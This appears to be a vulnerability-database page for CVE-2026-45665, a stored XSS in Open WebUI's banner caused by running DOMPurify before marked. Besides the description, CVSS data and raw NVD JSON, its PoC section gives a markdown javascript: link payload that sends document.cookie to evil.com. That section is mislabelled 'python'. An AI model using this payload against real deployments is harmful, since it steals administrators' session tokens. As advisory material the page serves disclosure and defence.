CVE-2026-45665

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Banner component due to an improper sanitization order (specifically, DOMPurify is executed before the marked library). This vulnerability allows a compromised or malicious administrator to plant a malicious payload in the global banner. Crucially, this vector enables Privilege Escalation, as the malicious banner is rendered for all users, including the Super Admin (Primary Admin). Consequently, the payload successfully bypasses the existing security mechanism. An attacker can leverage this to steal the Super Admin's session token This vulnerability is fixed in 0.8.0.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-45665
// Exploit the sanitization order: DOMPurify runs before marked.
// Input is treated as Markdown, allowing bypass of HTML sanitization.

// Payload to inject into the Banner configuration:
const maliciousPayload = "[Claim Admin Access](javascript:fetch('https://evil.com/steal?token='+document.cookie))";

// Analysis:
// 1. DOMPurify scans the input string. It sees plain Markdown syntax, not HTML tags, so it passes.
// 2. The 'marked' library parses the Markdown and generates an <a> tag with href="javascript:...".
// 3. The rendered banner contains the malicious link. When the Super Admin interacts with the banner,
//    the JavaScript executes, sending the session token to the attacker.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45665
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45665
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45665/
[4] VulDB https://vuldb.com/cve/CVE-2026-45665
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-cqp4-qqvg-3787

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45665", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:55.920", "lastModified": "2026-05-15T22:16:55.920", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Banner component due to an improper sanitization order (specifically, DOMPurify is executed before the marked library). This vulnerability allows a compromised or malicious administrator to plant a malicious payload in the global banner. Crucially, this vector enables Privilege Escalation, as the malicious banner is rendered for all users, including the Super Admin (Primary Admin). Consequently, the payload successfully bypasses the existing security mechanism. An attacker can leverage this to steal the Super Admin's session token This vulnerability is fixed in 0.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-cqp4-qqvg-3787", "source": "[email protected]"}]}}